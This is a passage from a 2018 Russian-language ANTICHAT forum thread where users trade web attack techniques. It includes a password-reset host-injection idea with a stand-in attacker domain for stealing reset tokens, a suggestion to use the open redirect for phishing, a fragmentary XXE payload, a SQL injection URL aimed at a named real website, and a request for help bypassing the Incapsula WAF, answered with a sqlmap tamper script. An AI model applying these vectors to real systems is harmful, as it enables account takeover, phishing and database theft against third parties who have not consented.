ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2381  
Старый 01.08.2018, 23:10
joelblack
Участник форума
Регистрация: 06.07.2015
Сообщений: 240
С нами: 5713526

Репутация: 145
По умолчанию

 
Ответить с цитированием

  #2382  
Старый 06.08.2018, 19:27
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

При сбросе пароля

Код:
host=ataker.ru&mail=asd@mail.ru
На почте приходит

Код:
https://site.com/forgot/ataker.ru/973bb5606f94bbaa2509c25977f257f1ce203ea1
После смены пароля редиректит на ataker.ru

Как идея я могу на ataker.ru словить Referer тем самым добыть ссылку восстановления пароля

Есть другие идеи эксплуатации?

----------------------------

PS Также Бурп видет XML injection увидев DNS обращениепри при вводе xml с инклудом в host, обрашение приходит с IP Roundcube, Можете помоч?
 
Ответить с цитированием

  #2383  
Старый 06.08.2018, 22:39
crlf
Постоянный
Регистрация: 18.03.2016
Сообщений: 673
С нами: 5344886

Репутация: 441


По умолчанию

Цитата:
Сообщение от Octavian  

После смены пароля редиректит на ataker.ru
Скорее всего, токен, после сброса пароля, станет невалидным, по крайней мере, так оно должно работать

Цитата:
Сообщение от Octavian  

Есть другие идеи эксплуатации?
Если редиректит незаметно, без ворнингов, то фишинг вполне может пройти.

Цитата:
Сообщение от Octavian  

PS Также Бурп видет XML injection увидев DNS обращениепри при вводе xml с инклудом в host, обрашение приходит с IP Roundcube, Можете помоч?
Этот момент не совсем ясен, нужно подробное описание или скриншоты. В качестве теста, можно попробовать заслать какой-нибудь простенький пейлод типа:

Код:
]>
&xxe;
И чекнуть резолв или реквест своего хоста в логах.
 
Ответить с цитированием

  #2384  
Старый 12.08.2018, 23:12
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

Цитата:
Сообщение от BigBear  

Пускай поздно, но промолчать не могу.
Для вас и других, кто прочтёт сообщение.
XSS разделяют на:
Stored или Persistent - хранимые (в простонародье активные)
Reflected - отраженные (... пассивные)
DOM-Based
Self-XSS (как Stored, так и Reflected) - исполняемые только на личных страницах и сценариях пользователя и не доступные другим пользователям
То что вы описываете, это называется User Interaction (действие пользователя). Соответственно бывают и Stored XSS with/without User Interaction, так и Reflected XSS with/without User Interaction
Так он на 5-5:35 не прав что называет Reflect XSS активной?

Или он не правильно высказался что при Reflect XSS = отраженая с точке зрения воздействия это активная поскольку нужно деиствия от юзера, а Stored XSS = хранимая с точке зрения воздействия это пасивная поскольку не нужно деиствия от юзера?
 
Ответить с цитированием

  #2385  
Старый 13.08.2018, 22:13
panic.ker
Познающий
Регистрация: 25.08.2013
Сообщений: 92
С нами: 6692726

Репутация: 3
По умолчанию

Жабу скинь. А вообще октавиан, "миллион" (необоснованная мной цифра) писали про это. Оваспы, разорчик подкидывает,бум оч хорошо пишет. Споров много, НО ВСЕ ЗАВИСИТ от вектора. Вот давай я щас дупля отобью, линков тебе накидаю чтоли. Ибо я не совсем трезв, к сожалению. Большой медведь верно говорит все
 
Ответить с цитированием

  #2386  
Старый 14.08.2018, 14:24
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

Как защитится от Pixel Flood? Просто в вебе
 
Ответить с цитированием

  #2387  
Старый 24.08.2018, 07:03
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами: 8814194

Репутация: 0
По умолчанию

[QUOTE="o314um"]

Есть одна интересная sql-inj.
Линк засветить не могу, но постараюсь дать максимально подробное описание.
немного условностей
№1 - обычный вывод информации на страницу
№2 - страница отображается, но без данных (не пустая страница)
№3 - пустая страница - скорее всего ситнтакксическая ошибка mysql (сам эррор не отображается)
[CODE]
id=62-1
 
Ответить с цитированием

  #2388  
Старый 26.08.2018, 13:02
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами: 9650336

Репутация: 662
По умолчанию

Код:
http://www.top50-solar.de/index.php?eID=tx_top50directory_pi2&L=1&tx_top50directory_pi2%5Bajaxcontroller%5D=searchziporcity&tx_top50directory_pi2%5Bcountrycode%5D=DEU%22)+order+by+1+--+
Есть варик на вывод колонок? проблема в том, что когда 1 колонка(по order by) ошибка страницы... по тайм байс перебор не берёт(
 
Ответить с цитированием

  #2389  
Старый 26.08.2018, 16:56
vikler
Познающий
Регистрация: 16.08.2012
Сообщений: 92
С нами: 7231286

Репутация: 0
По умолчанию

Кто-нибудь обходил incapsula WAF при скуле?

Есть mssql injection внутри convert(int,query)

при введении @@version в параметр получаем версию mssql

При попытке (select+@@version), (select(@@version)) incapsula WAF реагирует, 403

в общем-то, все обычные методы типы апострофов, комментариев, encode, и тд, пробую - не пропускает Incapsula.

Есть у кого опыт? есть хоть какой рабочий вектор?
 
Ответить с цитированием

  #2390  
Старый 26.08.2018, 17:52
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
С нами: 5745206

Репутация: 1
По умолчанию

Цитата:
Сообщение от vikler  

Кто-нибудь обходил incapsula WAF при скуле?
Есть mssql injection внутри convert(int,query)
при введении @@version в параметр получаем версию mssql
При попытке (select+@@version), (select(@@version)) incapsula WAF реагирует, 403
в общем-то, все обычные методы типы апострофов, комментариев, encode, и тд, пробую - не пропускает Incapsula.
Есть у кого опыт? есть хоть какой рабочий вектор?
https://github.com/sqlmapproject/sql...f/incapsula.py

*** знает поможет или нет

отпишись если поможет
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.